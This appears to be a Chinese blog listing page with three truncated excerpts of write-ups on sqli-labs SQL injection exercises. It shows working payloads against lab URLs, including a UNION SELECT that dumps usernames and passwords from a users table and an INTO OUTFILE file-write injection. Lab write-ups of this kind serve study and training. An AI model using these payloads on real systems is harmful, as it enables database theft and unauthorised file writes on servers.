摘要:
less 7 是上传文件 前提是要修改mysql 数据库配置文件my.ini 参数secure_file_priv='' payload http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,3 into outf 阅读全文
摘要:
通过查看其他博客(https://mochazz.github.io/2017/09/23/Double_%20SQL_Injection/#0x01-%E5%8F%8C%E6%9F%A5%E8%AF%A2)的解释得到自己的理解,主要是因为group by count(*),rand(*)这样的聚合 阅读全文
摘要:
less 2 跟less 1区别: 去掉单引号查询表的用户名与密码 http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,':',password) from security.users --+ less 3 跟l 阅读全文